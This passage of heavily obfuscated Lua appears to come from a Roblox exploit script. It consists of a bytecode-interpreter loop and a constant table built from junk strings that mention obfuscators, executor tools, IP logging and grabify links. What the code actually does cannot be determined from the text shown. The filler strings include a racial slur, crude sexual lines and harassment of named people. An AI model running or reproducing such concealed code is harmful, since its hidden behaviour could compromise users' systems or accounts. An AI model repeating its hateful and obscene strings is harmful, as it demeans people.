h=e[o];end end end end n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]][e[o]]=n[e[d]];e=e[x];e=e[x];end;elseif(a>t(818352516,818352603))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local f;local h;local a;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for x=0,34 do if t(8966,9631+x,3850)>=1925 then if t(4964,5273+x,3690)<1845 then if t(1974,4528+x,1904)>952 then a=e[f];else n[a]=h;end else if t(1950,8362+x,1806)>=903 then else if(n[e[l]]==e[d])then b=b+1;else b=e[o];end;end end else if t(1653,4465+x,3258)<1629 then if t(9115,3208+x,2868)>1434 then n[e[l]]=i[e[o]];else end else f=l;if t(5842,3629+x,2208)>=1104 then h=e[o];else end end end end local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local s;local i;local f;local c=0;local a=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for o=0,30 do if t(1308,8900+o,3976)>1988 then if t(9298,3151+o,2042)<=1021 then if t(6779,5536+o,1432)<=716 then if a==-1 then for e=f,r do n[e]=nil;end;a=-2 end;else end else if t(2168,2401+o,2604)>=1302 then else end end else s=l;if t(3296,1704+o,602)>301 then if t(4483,5732+o,2204)>1102 then f=i[s];else end if a>-1 then n[f](n[1+f]);a=-1 end;else if t(5619,4742+o,2672)>=1336 then else i=e;end end end end n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];elseif(a<t(431248461,431248429))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local h;local E;local a;local f;local u;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for x=1,33 do if t(6064,3125+x,3978)>=1989 then if t(7445,4248+x,1362)>681 then if t(2529,6853+x,1328)>664 then u=e[E];else a=e[o];end else if t(6749,4739+x,2726)<1363 then else E=l;end end else if t(7860,4722+x,2220)<1110 then if t(5548,9424+x,3856)>1928 then n[u]=f;else n[e[l]]=n[e[o]]+e[d];end else if t(6351,8152+x,1774)>887 then f=h[a];else h=i;end end end end n[e[l]]=n[e[o]][e[d]];e=e[x];local a;local i;local f;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for x=1,27 do if t(9062,3692+x,2946)<1473 then if t(2503,6051+x,3534)>1767 then if t(7227,4235+x,996)<=498 then n[e[l]]=e[o]-e[d];else f=e[a];end else if t(5085,4523+x,1870)>=935 then else a=l;end i=e[o];end else if t(6096,9269+x,2312)<1156 then if t(3598,9866+x,2444)<=1222 then else end else if t(2871,9423+x,638)>=319 then n[f]=i;else if(e[l]~=e[d])then b=b+1;else b=e[o];end;end end end end n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]][e[o]]=n[e[d]];e=e[x];e=e[x];end;elseif(a<=h(535318271,1201672))then if(a<=((f[130868762])or((function(e)f[130868762]=t((t(t(t(e,544232),793626),843325))-788648,5291);return(f[130868762]);end)(t(853102435,c[596954169])))))then if(a>97)then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local f;local a;local h;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for x=2,32 do if t(9877,7472+x,3312)>=1656 then if t(3424,1666+x,2288)<1144 then if t(9434,9679+x,2662)<1331 then else end else if t(2322,5811+x,2268)>1134 then else f=l;end a=e[o];end h=e[f];else n[h]=a;if t(6221,2047+x,1122)<=561 then if t(5606,5396+x,2550)<1275 then else end else if t(4394,6793+x,1704)<852 then else end end end end n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];elseif(a<((f[147446116])or((function(e)f[147446116]=t(t(t(t((e)-910132,504631),327552),124927),798101);return(f[147446116]);end)(t(592871038,c[187327285])))))then local e=e[l];local o,l=m(n[e](n[e+1]));E=l+e-1;local l=0;for e=e,E do l=l+1;n[e]=o[l];end;end;elseif(a==((f[248516418])or(c[940634745](t(573368968,c.ohZWzer),t,f,248516418))))then e=e[x];n[e[l]]=i[e[o]];e=e[x];local c=e[l];local t=n[e[o]];n[c+1]=t;n[c]=t[e[d]];e=e[x];local h;local f;local a;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for x=1,27 do if t(7744,6887+x,2942)<=1471 then if t(4896,7550+x,3856)>=1928 then if t(1016,6003+x,1034)>517 then else end else if t(4506,9524+x,426)<213 then h=l;else end f=e[o];end a=e[h];else if t(3177,3258+x,2504)>=1252 then if t(3515,2248+x,616)>=308 then else end else n[a]=f;if t(8100,9384+x,3020)>1510 then else end end end end local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=n[e[o]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]];e=e[x];local h;local f;local a;local u;local b;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for x=2,26 do if t(7216,5954+x,1552)>=776 then if t(2646,6035+x,772)>=386 then if t(8091,9071+x,1680)<840 then else end else b=e[f];if t(6349,8135+x,3500)<1750 then n[b]=u;else end end else if t(2109,4486+x,802)<=401 then if t(1959,2606+x,1794)>897 then h=i;else u=h[a];end else f=l;if t(8265,5153+x,926)>463 then a=e[o];else end end end end n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][n[e[d]]];e=e[x];local b;local u;local h;local a;local f;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for x=2,28 do if t(9419,4300+x,3978)>=1989 then if t(4965,9845+x,2324)<1162 then if t(9370,9356+x,1004)>502 then else end else if t(9547,8391+x,2940)>=1470 then h=e[o];else end end a=b[h];else if t(4551,3806+x,3092)<1546 then b=i;if t(8221,8314+x,2546)<1273 then else u=l;end else f=e[u];if t(9859,2033+x,3332)<1666 then n[f]=a;else end end end end n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][n[e[d]]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=n[e[o]];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];local t=e[l];local o=n[e[o]];n[t+1]=o;n[t]=o[e[d]];e=e[x];local l=e[l];n[l](n[1+l]);for e=l,r do n[e]=nil;end;e=e[x];e=e[x];elseif(a<=((f[432393127])or(c[887439793](t(5577362,6203453),t,f,432393127))))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local c=e[l];local t=n[e[o]];n[c+1]=t;n[c]=t[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local f;local a;local h;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for x=1,30 do if t(7466,4066+x,492)>246 then if t(8828,2806+x,1304)<=652 then if t(1600,9062+x,3590)<1795 then else n[h]=a;end else if t(8777,3615+x,1070)<535 then else end end else f=l;if t(8900,2497+x,1092)>=546 then a=e[o];if t(2975,4571+x,1114)<557 then if(e[l]~=e[d])then b=b+1;else b=e[o];end;else h=e[f];end else if t(9304,2464+x,2038)>1019 then else end end end end n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local f;local a;local h;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for x=0,28 do if t(7245,8351+x,2560)>=1280 then if t(3930,3010+x,1782)<891 then n[h]=a;if t(3522,6235+x,2518)>=1259 then else end else a=e[o];if t(1624,6666+x,508)>254 then else h=e[f];end end else if t(3284,1789+x,3114)<1557 then if t(8793,8606+x,866)<=433 then else end else if t(1864,1796+x,2734)>=1367 then else f=l;end end end end local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];end;elseif(a<=t(505177077,505176979))then if(a==101)then local e=e[l];do return s(n,e,E);end;elseif(a<=102)then e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local c;local a;local h;local r;local f;local t=0;local function d(e,n,l)e=(t+e)%3 t=((e~=0)and t+((1==e)and n or-n)or t*n)%l return t end for x=2,27 do if d(2207,9482+x,1820)>910 then if d(5389,1412+x,356)<178 then if d(2040,9654+x,484)>242 then else end else c=i;if d(7221,3649+x,622)>311 then a=l;else end end h=e[o];else r=c[h];if d(3161,3603+x,3850)<1925 then if d(6344,4266+x,1182)<591 then n[f]=r;else f=e[a];end else if d(1326,3412+x,2952)>=1476 then else end end end end n[e[l]]=n[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local d=e[l];local t,o=m(n[d](s(n,d+1,e[o])));E=o+d-1;local o=0;for e=d,E do o=o+1;n[e]=t[o];end;e=e[x];local o=e[l];do return n[o](s(n,o+1,E))end;e=e[x];local l=e[l];do return s(n,l,E);end;e=e[x];e=e[x];end;elseif(a>((f[725910698])or(c[621594471](t(770590814,770685516),t,f,725910698))))then n[e[l]][n[e[o]]]=e[d];elseif(a<t(344962313,c[690511759]))then local f;local a;local c;local t=0;local function d(e,n,l)e=(t+e)%3 t=((e~=0)and t+((1==e)and n or-n)or t*n)%l return t end for x=2,26 do if d(5964,1759+x,1222)>611 then if d(5680,6270+x,2414)>1207 then if d(4397,5282+x,2694)<1347 then else c=e[f];end else if d(4191,5021+x,1074)>537 then else end end else if d(3713,6457+x,3890)<=1945 then if d(4896,6147+x,1726)<=863 then f=l;else n[c]=a;end else if d(9436,7190+x,2632)>1316 then else a=e[o];end end end end n[e[l]]=(e[o]~=0);e=e[x];local l=e[l];n[l](s(n,l+1,e[o]));for e=l+1,r do n[e]=nil;end;e=e[x];e=e[x];end;elseif(a<=h(t(453737098,414072716),t(978389702,978000529)))then if(a<=t(109497312,109497228))then if(a<=h(t(454658730,c[671259666]),233687))then if(a>105)then if(n[e[l]]~=n[e[d]])then b=e[o];end;elseif(a<((f[740313050])or((function(e)f[740313050]=(t(t(t(e,506675),453153),697549))-192234;return(f[740313050]);end)(t(247648493,248236646)))))then n[e[l]]=n[e[o]][e[d]];end;elseif(a==((f[73282101])or((function(e)f[73282101]=t(t((t(t(e,195173),957243))-516094,301386),117154);return(f[73282101]);end)(t(341031169,340977886)))))then n[e[l]]=#n[e[o]];elseif(a<=((f[816258252])or(c["Utp3sr"](t(923997592,923537783),t,f,816258252))))then local e=e[l];local o,l=m(n[e](s(n,e+1,E)));E=l+e-1;local l=0;for e=e,E do l=l+1;n[e]=o[l];end;for e=E+1,r do n[e]=nil;end;end;elseif(a<=h(t(832600967,1001738947),233683))then if(a==t(396277093,c[772940926]))then local a;local c;local r;local t;local f;local d=0;local function x(e,n,l)e=(d+e)%3 d=((e~=0)and d+((e<2)and-n or n)or d*n)%l return d end for d=0,34 do if x(6716,5273+d,592)>296 then if x(3281,8709+d,500)<=250 then if x(9179,5874+d,428)>=214 then i[t]=f;else a=e;end c=n;else if x(6407,2074+d,770)>=385 then else end end r=l;else if x(1173,3711+d,1852)>926 then if x(5522,2221+d,1478)>739 then else end else if x(8290,4681+d,826)>=413 then t=e[o];else end end f=c[a[r]];end end elseif(a<=h(29441446,458472))then if(n[e[l]]>n[e[d]])then b=e[o];end;end;elseif(a==((f[54651032])or((function(e)f[54651032]=t((t(t(e,471609),983257))-159984,478438);return(f[54651032]);end)(t(749651342,749685271)))))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local c=e[l];local t=n[e[o]];n[c+1]=t;n[c]=t[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];local f;local h;local a;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for x=2,32 do if t(3988,9464+x,1504)<=752 then if t(3191,9179+x,408)<204 then if t(5893,3183+x,3392)<=1696 then f=l;else end h=e[o];else if t(9338,1408+x,1204)>602 then n[e[l]]=n[e[o]];else end end else if t(8176,9144+x,3164)>1582 then if t(7502,3702+x,1626)>=813 then else end else a=e[f];if t(2060,2347+x,1052)>=526 then n[a]=h;else end end end end n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];elseif(a<=t(839596605,839596621))then e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=u[e[o]];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local l=n[e[o]];n[t+1]=l;n[t]=l[e[d]];e=e[x];e=e[x];end;elseif(a<=((f[702912794])or((function(e)f[702912794]=t((t(e,596380))-729360,625116);return(f[702912794]);end)(t(255838553,c["WqUY0Z5g"])))))then if(a<=h(t(409340634,845652990),1211641))then if(a>((f[362043477])or(c["kW0zoA"](t(276323918,c[262668696]),t,f,362043477))))then n[e[l]]=e[o]/n[e[d]];elseif(a<((f[48371504])or(c[35725826](t(287764603,c[671259666]),t,f,48371504))))then local t;local c;local r;local s;local i;local a;local d=0;local f=0;local function x(e,n,l)e=(d+e)%3 d=((e~=0)and d+((1==e)and n or-n)or d*n)%l return d end for d=0,30 do if x(9920,7669+d,702)>=351 then if x(7166,7568+d,3878)>=1939 then if x(5698,3481+d,3528)<1764 then else r=l;end s=n;else if x(3765,2934+d,1228)<=614 then a=t[r];else end end else t=e;if x(4741,1472+d,3510)<1755 then if x(2861,4523+d,614)>=307 then c=o;else i=s[t[c]];end else if f~=1 then n[a]=i;f=1;end;if x(2853,7188+d,2036)>1018 then else end end end end end;elseif(a>t(611423055,c["cN2mXrfEeC"]))then n[e[l]]=(e[o]~=0);elseif(a<((f[147933482])or(c["jmjjYCr"](t(855374063,c[596954169]),t,f,147933482))))then n[e[l]]=n[e[o]]/n[e[d]];end;elseif(a<=h(t(181403239,354922648),1201690))then if(a==h(t(632240122,c[387680078]),t(459529125,460115833)))then if(n[e[l]])then b=e[o];end;elseif(a<=h(61162758,1708113))then n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];local c=e[l];local t=n[e[o]];n[c+1]=t;n[c]=t[e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];local c=e[l];local t=n[e[o]];n[c+1]=t;n[c]=t[e[d]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];local c=({n[t](s(n,t+1,e[o]))});local o=e[d];local l=0;for e=t,o,1 do l=l+1;n[e]=c[l];end;for e=o+1,r do n[e]=nil;end;e=e[x];e=e[x];end;elseif(a==((f[473418490])or((function(e)f[473418490]=t(t(((e)-61088)-715685,405423),345653);return(f[473418490]);end)(t(903363399,c[228207737])))))then n[e[l]]=n[e[o]][n[e[d]]];elseif(a<=120)then do return(n[e[l]]);end;e=e[x];e=e[x];end;until false end);end;return B(z(),{},_())(...);end)(({[(887439793)]=((function(l,o,e,n)e[n]=((o((l)-((#{336;851;(function(...)return;end)()}+48648)),((136241-#("???")))))-((416906-#("Sussy Baka obfuscator v1.5"))))-((164794-#("wtf")));return(e[n]);end));[((432036274-#("OBAMA IS WHITE! OBAMA IS WHITE! OBAMA IS WHITE! OBAMA IS WHITE! OBAMA IS WHITE!")))]=((function(o,l,n,e)n[e]=l((((o)-((868967-#("prostate"))))-(542771))-(936904),((#{413;400;}+875589)));return(n[e]);end));[(477086844)]=((841110));[(596954169)]=(((853401085-#("transferring my boost in 3 hours"))));[(841182038)]=((function(o,e,l,n)l[n]=(e(e(o,((782141-#("Raid: Shadow Legends here, I can confirm this script was skidded")))),((#{}+110247))))-(126830);return(l[n]);end));["pUQwVV0"]=((100159671));[((#{773;368;524;}+592788171))]=(((#{(function(...)return...;end)(4,257)}+366)));[((#{144;(function(...)return 149;end)()}+249941251))]=((913459961));[(165995577)]=((510250603));x1SUAZt0=(((#{765;726;826;936;(function(...)return 782;end)()}+15)));[(63487190)]=(((#{297;(function(...)return 629,...;end)(374,994)}+756317793)));[((#{399;721;394;312;}+401278269))]=(((#{459;570;527;939;(function(...)return 628,433,...;end)(313,103)}+655355754)));[((323912689-#("px1#5454")))]=("\110");[((1966970-#("federal agency of deez nuts")))]=((677301517));[(343335124)]=(((#{754;(function(...)return 737,962;end)()}+29)));bAuMS=((36));["dVzJU9"]=((674));[(563461517)]=((370860001));[(690511759)]=(((#{563;229;428;951;}+344962397)));[(498401925)]=(((#{184;(function(...)return...;end)()}+89)));["gqO0c"]=((248264983));[((167833490-#("I am a registered sex offender i stuck mt dick into a blender, your mom is a transgender")))]=((681042554));[(289978309)]=(((138874743-#("Jackson Jack Tension"))));[((240712643-#("sussy imposter?")))]=(((#{474;}+7802)));[(387680078)]=((142647117));[((369230935-#("My tips sticky rn my tip my tips creaming I am playing with a Lil bit ohoho")))]=(((249077529-#("I am leaving CS:GO and giving away my knives. Hurry up pick some >> discord.gg psu"))));[(152219730)]=(((#{124;}+501423378)));[((#{31;619;446;(function(...)return 795;end)()}+709137563))]=((function(o,n,e,l)e[l]=(n(n(((o)-((490441-#("never gonna give you up"))))-((886757-#("help if you see this perth has me locked up in his basement i need help"))),((#{680;}+200612))),(355180)))-(204210);return(e[l]);end));[(621252305)]=("\109");['yk32jm']=((2047));zOlbw=(((868347135-#("perth is sus"))));["ukHup"]=((function(o,e,l,n)l[n]=e((e(e(o,((#{858;302;}+792090))),((180089-#("Ok we can continue the")))))-((666666-#("Balls"))),((#{}+501521)));return(l[n]);end));["MQISOu"]=(((#{59;297;425;688;}+112937542)));[((#{130;584;(function(...)return 704,253,493;end)()}+537435816))]=(((269719836-#("apt install sl -y"))));ohZWzer=(((573943710-#("C# - more used in the gaming industry, plugins, etc., C++ - more used in machine learning, game engine development (physics, etc.), software development, sometimes in websites (for server-security purposes)"))));['btqlWDZBhG']=(((871098046-#("!rank"))));[(668794168)]=((function(o,e,n,l)n[l]=(e((e(o,((581862-#("funeralW")))))-(627121),((437395-#("Ryonechicken really got some debt and money issues")))))-((#{53;212;223;100;(function(...)return 114,125;end)()}+957930));return(n[l]);end));[(723896148)]=((1348));[((140361446-#("Overdrive is a skill based fighting game! Better than UCD or Soulshatters.")))]=(((#{899;152;552;933;(function(...)return 574,714,...;end)()}+16777210)));[(249714393)]=((function(o,l,n,e)n[e]=(((l(l(o,((59589-#("can i put my ballsss in yo jawww")))),(214339)))-(886046))-(153832))-((680749-#("Perth please shut the fuck up and dont spam here i forgor to mute here")));return(n[e]);end));[((253204416-#("e621.net for op roblox scripts")))]=((577840283));["H0Qwk0iE0P"]=(((27-#("Hacking into the mainframe"))));[((#{(function(...)return 815,11,153,...;end)(671,166,439)}+791106657))]=(((35-#("My penis is big ( im lying )"))));[(708256307)]=(((24-#("Sussysusususususuussusus"))));[((112937582-#("You lookin real sussy over there!!!!")))]=("\107");[((#{842;436;852;(function(...)return;end)()}+125643707))]=(((829844085-#("what"))));['E2mruo']=((function(o,e,l,n)l[n]=e(e(e(o,(65100)),(436072)),((#{517;377;}+472562)));return(l[n]);end));[((273310026-#("8-4=4*0.5=2, 1e1e1e=gr_y")))]=(((5064-#("iPhone 46 Pro Ultra Extreme Diamond Platinum Max Supersized Plus"))));n0g3HPx=(((12-#("grrr"))));[((#{937;461;865;}+940634742))]=((function(o,l,e,n)e[n]=l(((o)-((880405-#("Gay buttsex"))))-((114825-#("nigerien balls"))),((#{(function(...)return 789;end)()}+660655)));return(e[n]);end));["iiq8EzS"]=("\100");[(807506878)]=((993880799));["lBq8bnLzg"]=((323912681));[(35725826)]=((function(l,o,e,n)e[n]=(((((l)-((971166-#("cum"))))-(585021))-((#{810;166;(function(...)return 278,906;end)()}+294343)))-(614523))-((#{386;605;496;}+308738));return(e[n]);end));[(925637430)]=(((563643491-#("cumhead"))));[((655355785-#("Omer faruk is a hot cum")))]=("\102");[((#{473;359;}+388999016))]=((894060078));[((126071844-#("this script was obfuscated using moonsec")))]=(((1464-#("glockfrauddd#9444 ON TOP"))));[((839102469-#("<:waa:820486050937307167>")))]=((function(l,o,e,n)e[n]=((o((l)-((#{}+85660)),(573863)))-((239363-#("memcorrupt hospitalized perth is that u"))))-((989835-#("shlex is so sexy")));return(e[n]);end));[((#{582;748;377;(function(...)return 106,...;end)()}+384957345))]=((function(o,e,n,l)n[l]=(e(e(o,((#{771;567;597;(function(...)return 635,902,608;end)()}+751331))),(326206)))-(970662);return(n[l]);end));[(205978730)]=((154));[(1181968)]=(((#{}+814111)));[(871098041)]=("\50");[(953720252)]=((189332014));[(458835300)]=(((#{271;120;88;(function(...)return...;end)(766)}+0)));[(905724386)]=(((#{308;214;12;}+1020)));['ck1ee9L4Bn']=((454614227));['jmjjYCr']=((function(o,l,e,n)e[n]=l(((((o)-(297368))-((#{(function(...)return 888,975,631;end)()}+292223)))-(368131))-(910185),(632024));return(e[n]);end));[(719847174)]=(((65561-#("there are was no bytecode"))));[((860843701-#("What the fuck")))]=((34249));["uxMMflkQ"]=("\115");[((#{506;}+187327284))]=(((#{}+592058253)));[((902627274-#("Slowmode is enabled. Members can only send one message every lifetime.")))]=(((266-#("i like men"))));[(307271135)]=((function(o,e,l,n)l[n]=e(e((e(o,(876254)))-((122583-#("perth is cool"))),((#{}+555512))),(955788));return(l[n]);end));[(913459961)]=("\43");[(200244934)]=((function(l,o,e,n)e[n]=o(((l)-((#{247;573;176;923;}+441452)))-(610175),((#{(function(...)return 796,...;end)()}+883734)));return(e[n]);end));['ISSg7L8l']=((function(o,e,l,n)l[n]=e((e((o)-((872163-#("Sonic says: sonic says: sonic says: sonic says"))),((#{(function(...)return 328,...;end)(329,473)}+339923))))-((#{248;2;821;(function(...)return 802,629,539,170,...;end)(76)}+375853)),(47669));return(l[n]);end));[(695852875)]=(((590600893-#("faint#6969 is a big skid. wait.."))));hRqzXYmx=(((#{876;618;1;(function(...)return 547,117,487;end)()}+919967030)));[((#{}+862112943))]=(((#{158;469;586;565;}+159413585)));[((#{}+269719819))]=("\97");[(232752059)]=((function(o,n,l,e)l[e]=n(n((o)-((858414-#("script-ware >synapse> krnl > sentinel > jjspoit > sirhurt"))),(802260)),(441134));return(l[e]);end));[(454240379)]=(((801782611-#("ass"))));[(189332014)]=("\116");[((942953568-#("lucian#9999")))]=((731329304));["qS5zSnQ0"]=("\40");x0r6Y0SDV=("\111");[(566271629)]=(((662665306-#("Cock ++"))));[((#{950;(function(...)return...;end)()}+349974813))]=((function(l,o,n,e)n[e]=(((l)-(309539))-(138947))-(959462);return(n[e]);end));Q0tip=("\108");[((#{475;375;963;416;}+284191214))]=((function(o,e,l,n)l[n]=e(e(e(o,((432976-#("Ez IP logged")))),((722680-#("like")))),(264540));return(l[n]);end));[((228207746-#("I said ok")))]=(((903315341-#("i farted to this discord"))));[((681042566-#("grabify.link")))]=("\114");[(764945195)]=((368892836));['MGL80j2']=("\105");[(229559301)]=(((#{709;790;3;953;(function(...)return 347;end)()}+187029930)));["WIdu1oU"]=(((#{767;715;968;(function(...)return 181,436,...;end)()}+240229642)));[(874467716)]=((function(o,e,l,n)l[n]=e(e(e(o,(377223)),((180730-#("wone more MEME string by #jaack0001")))),((64508-#("fuck u dogix"))));return(l[n]);end));[((#{320;980;(function(...)return 568,...;end)()}+921334487))]=((5));[(305379501)]=((165));[((846000602-#("balls in yo jaws (yo jaws)")))]=("\120");[((#{}+812419154))]=((372232539));[(21591876)]=(((#{911;(function(...)return 